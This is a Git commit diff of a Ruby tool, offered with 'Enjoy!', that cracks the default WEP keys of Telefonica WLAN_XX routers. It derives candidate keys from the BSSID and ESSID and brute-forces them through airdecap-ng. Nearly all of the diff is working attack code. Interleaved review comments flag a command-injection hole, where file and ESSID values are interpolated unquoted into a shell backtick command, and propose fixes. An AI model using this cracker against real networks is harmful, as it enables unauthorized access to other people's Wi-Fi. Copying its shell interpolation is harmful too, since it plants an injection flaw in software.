
From a dorky script to a pretty decent class

1 parent 47649dc commit 5408912b4ef2c9c1fc5e1dc86c7d70ab2dc3c4f8 X committed Jul 30, 2009
Showing with 164 additions and 86 deletions.
  1. +2 −2 README
  2. +15 −0 README~
  3. +0 −84 crack.rb
  4. +38 −0 init.rb
  5. +109 −0 lib/wep_cracker.rb
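--- a/README
+++ b/README
@@ -7,9 +7,9 @@ NOTE: This script needs aircrack-ng suite to run properly. The airodump capture
 -----------------------
-USAGE: ruby crack.rb -b <bssid> -e <essid> -f <airodump_capture_file>
+USAGE: ruby init.rb -b <bssid> -e <essid> -f <airodump_capture_file>
-EXAMPLE: ruby crack.rb -b 00:11:22:33:44:55 -e WLAN_0F -f dump-01.cap
+EXAMPLE: ruby init.rb -b 00:11:22:33:44:55 -e WLAN_0F -f dump-01.cap
 Enjoy!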
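--- a/README~
+++ b/README~
@@ -0,0 +1,15 @@
+Wep Cracker
+-----------------------
+
+A little script intended to crack Telefonica WEP Keys (the WLAN_XX kind), based on the default WEP key setting on certain router models.
+
+NOTE: This script needs aircrack-ng suite to run properly. The airodump capture file must have at least 1 IV to decrypt.
+
+-----------------------
+
+USAGE: ruby crack.rb -b <bssid> -e <essid> -f <airodump_capture_file>
+
+EXAMPLE: ruby crack.rb -b 00:11:22:33:44:55 -e WLAN_0F -f dump-01.cap
+
+Enjoy!
+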
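--- a/crack.rb
+++ b/crack.rb
@@ -1,84 +0,0 @@
-def get_letter_from(number)
- case number
- when /^001349/
- return "Z"
- when /^0030DA/
- return "C"
- when /^000138/
- return "X"
- else
- return "N"
- end
-end
-
-
-def sec2hms(secs)
- time = secs.round
- sec = time % 60.to_i
- time /= 60
- mins = time % 60
- time /= 60
- hrs = time % 24
- [hrs,mins,sec]
-end
-
-bssid = ''
-essid = ''
-file = ''
-
-ARGV.each_with_index do |arg, num|
- case arg
- when '-b'
- bssid = ARGV[num+1]
- when '-e'
- essid = ARGV[num+1]
- when '-f'
- file = ARGV[num+1]
- end
-end
-
-start = bssid.gsub(':','')[0..6].upcase
-puts start.inspect
-letter = get_letter_from(start)
-ending = essid.split('_').last.upcase
-
-number_options = []
-
-16.times do |f|
- 16.times do |s|
- 16.times do |t|
- number_options << [f.to_s(16),s.to_s(16),t.to_s(16)]
- end
- end
-end
-
-options = []
-
-number_options.each do |n|
- options << "#{letter}#{start}#{n.join.upcase}#{ending}"
-end
-
-rate = 0
-eta = 0
-counter = 0
-starting_at = Time.now
-len = options.length
-options.shuffle.each do |option|
- a = `airdecap-ng -w #{option.unpack('H*')} #{file} -e #{essid}`
- if a.match(/\nNumber of decrypted WEP packets[\s]+[^0]+\n/) then
- puts a
- puts "Decrypted packet with key #{option} !"
- exit(0)
- end
- counter += 1
- rate = (counter / (Time.now - starting_at).to_f).to_i
- eta = sec2hms((len - counter) / rate.to_f)
- elapsed = sec2hms(Time.now.sec - starting_at.sec.to_f)
- showable_eta = "#{eta[0]} hours, #{eta[1]} minutes and #{eta[2]} seconds"
- showable_elapsed = "#{elapsed[0]} hours, #{elapsed[1]} minutes and #{elapsed[2]} seconds"
- system("clear")
- puts "Telefonica WEP Cracker 0.1 Alpha Release"
- puts "Tried #{counter} keys... out of #{len}"
- puts "#{rate} keys/sec | ETA: #{showable_eta} | Elapsed: #{showable_elapsed}"
-end
-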
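--- a/init.rb
+++ b/init.rb
@@ -0,0 +1,38 @@
+require 'rubygems'
+require 'lib/wep_cracker'
+#require 'benchmark'
+
+# First of all, check if airdecap-ng is present. Quit if not!
+
+raise "Your system doesn't seem to have aircrack-ng suite installed.\nPlease install it before using WepCracker." unless `airdecap-ng` =~ /Airdecap-ng [0-9]/
+
+# Get the mandatory arguments from args: BSSID, ESSID and captures file
+
+bssid = ''
+essid = ''
+file = ''
+
+ARGV.each_with_index do |arg, num|
+ case arg
+ when '-b'
+ bssid = ARGV[num+1]
+ raise "This BSSID looks invalid." unless bssid =~ /^([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}$/
+ when '-e'
+ essid = ARGV[num+1]
+ raise "This ESSID doesn't look like a WLAN_XX kind." unless essid =~ /^WLAN_[0-9a-fA-F]{2}$/
+ when '-f'
+ file = ARGV[num+1]
+ raise "File doesn't exist." unless File.exists?(file)
+ end
+end
+
+
+wep_cracker = WepCracker.new(:bssid => bssid,
+ :essid => essid,
+ :file => file)
+
+#Benchmark.bm(7) do |x|
+# x.report("WepCracker::crack! :") {wep_cracker.crack!}
+#end
+
+wep_cracker.crack!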
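Review bot: The validators on the `-b` and `-e` branches anchor with `^`/`$`, which in Ruby match per line, so a value carrying an embedded newline still passes and is later interpolated unquoted into the airdecap-ng command string by `WepCracker#crack!`; anchor the whole string instead, `raise "This BSSID looks invalid." unless bssid =~ /\A([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}\z/` and `raise "This ESSID doesn't look like a WLAN_XX kind." unless essid =~ /\AWLAN_[0-9a-fA-F]{2}\z/`. `File.exists?` on the `-f` branch is the deprecated spelling of `File.exist?`, and that check also accepts a directory or a path with shell metacharacters, which the class then hands to the shell verbatim. A flag that is simply absent leaves its variable as `''` with no validation at all, so `WepCracker.new` receives empty strings and fails later with a less useful message; a `raise` after the loop for any empty value would fail fast. `require 'lib/wep_cracker'` relies on the working directory being on the load path, which later Ruby releases dropped by default; `require File.expand_path('lib/wep_cracker', File.dirname(__FILE__))` is portable.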
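--- a/lib/wep_cracker.rb
+++ b/lib/wep_cracker.rb
@@ -0,0 +1,109 @@
+class WepCracker
+
+ def initialize(options)
+
+ @bssid ||= options[:bssid]
+ @essid ||= options[:essid]
+ @file ||= options[:file]
+
+ @options = generate_options
+
+ end
+
+ def crack!
+
+ rate = 0
+ eta = 0
+ counter = 0
+ starting_at = Time.now
+ len = @options.length
+ @options.shuffle.each do |option|
+ a = `airdecap-ng -w #{option.unpack('H*')} #{@file} -e #{@essid}`
+ if a.match(/\nNumber of decrypted WEP packets[\s]+[^0]+\n/) then
+ puts "Decrypted packet from #{@essid} (BSSID: #{@bssid} with key #{option} !"
+ exit(0)
+ end
+ counter += 1
+
+ rate = (counter / (Time.now - starting_at).to_f).to_i
+ eta = sec2hms((len - counter) / rate.to_f)
+ elapsed = sec2hms(Time.now.sec - starting_at.sec.to_f)
+ system("clear")
+ puts "Telefonica WEP Cracker 0.1 Alpha Release"
+ puts "Tried #{counter} keys... out of #{len}"
+ puts "#{rate} keys/sec | ETA: #{humanize_time(eta)} | Elapsed: #{humanize_time(elapsed)}"
+ end
+ puts "\n\nSorry, this access point must have changed the default password: it couldn't be cracked."
+
+ end
+
+ private
+
+ def generate_options
+
+ start = @bssid.gsub(':','')[0..6].upcase
+
+ begin
+ letter = get_letter_from(start)
+ rescue=>e
+ puts "There has been an error: #{e}"
+ end
+
+ ending = @essid.split('_').last.upcase
+
+ number_options = []
+ options = []
+
+ 16.times do |f|
+ 16.times do |s|
+ 16.times do |t|
+ number_options << [f.to_s(16),s.to_s(16),t.to_s(16)]
+ end
+ end
+ end
+
+ number_options.each do |n|
+ options << "#{letter}#{start}#{n.join.upcase}#{ending}"
+ end
+
+ return options
+
+ end
+
+ def get_letter_from(number)
+ case number
+ when /^001349/
+ return "Z"
+ when /^0030DA/
+ return "C"
+ when /^000138/
+ return "X"
+ else
+ raise "Unfortunately, this BSSID doesn't belong to any of the three supported router models."
+ end
+ end
+
+ def sec2hms(secs)
+ time = secs.round
+ sec = time % 60.to_i
+ time /= 60
+ mins = time % 60
+ time /= 60
+ hrs = time % 24
+ [hrs,mins,sec]
+ end
+
+ def humanize_time(hms)
+ seconds = "#{hms[2]} second"
+ seconds += 's' if hms[2] != 1
+ minutes = "#{hms[1]} minute"
+ minutes += 's' if hms[1] != 1
+ minutes += ' and '
+ hours = "#{hms[0]} hour"
+ hours += 's' if hms[0] != 1
+ hours += ', '
+ "#{hours}#{minutes}#{seconds}"
+ end
+
+
+end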
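Review bot: `crack!` builds the airdecap-ng command by interpolating `@file` and `@essid` into a backtick string, and the class performs no validation of its own (only init.rb does), so a path with a space or shell metacharacter is split or interpreted by the shell; pass an argument vector instead, e.g. `out = IO.popen(['airdecap-ng', '-w', key_hex, @file, '-e', @essid], &:read)` where `key_hex` is the hex-encoded key string already computed on that line (argv form of `IO.popen` requires Ruby 1.9 or later). `generate_options` rescues the exception from `get_letter_from`, prints it and carries on with `letter` still `nil`, which contradicts the intent of the `raise` message; let it propagate, or re-raise after logging. The elapsed figure is derived from `Time.now.sec - starting_at.sec`, the seconds-within-the-minute fields rather than a duration, so it is wrong after sixty seconds; `Time.now - starting_at`, already used for `rate`, is the value intended. In `initialize`, `@bssid ||= options[:bssid]` on a fresh instance is a plain assignment written as a memoisation; `@bssid = options[:bssid]` says what it does. The class and its public methods carry no documentation; a header comment stating that an instance is built from `:bssid`, `:essid` and `:file`, that `@options` is precomputed in the constructor, and that `crack!` terminates the process via `exit(0)` on success would help a reader.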
